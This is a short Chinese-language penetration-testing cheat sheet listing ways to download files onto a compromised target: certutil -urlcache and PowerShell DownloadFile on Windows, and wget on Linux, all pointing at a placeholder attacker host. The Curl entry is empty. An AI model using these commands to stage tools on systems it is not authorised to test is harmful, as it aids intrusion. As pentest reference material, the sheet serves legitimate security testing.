渗透测试人员文件下载的主要方法
目标机器为Windows:
Certutil.exe
certutil -urlcache -split -f "http://ip-addr:port/file"
[output-file]
Powershell
powershell -c (New-Object Net.WebClient).DownloadFile('http://ip-addr:port/file',
'output-file')
目标机器为Linux
wget http://ip-addr[:port]/file[-o output-file].
Curl
STRIVE FOR PROGRESS,NOT FOR PERFECTION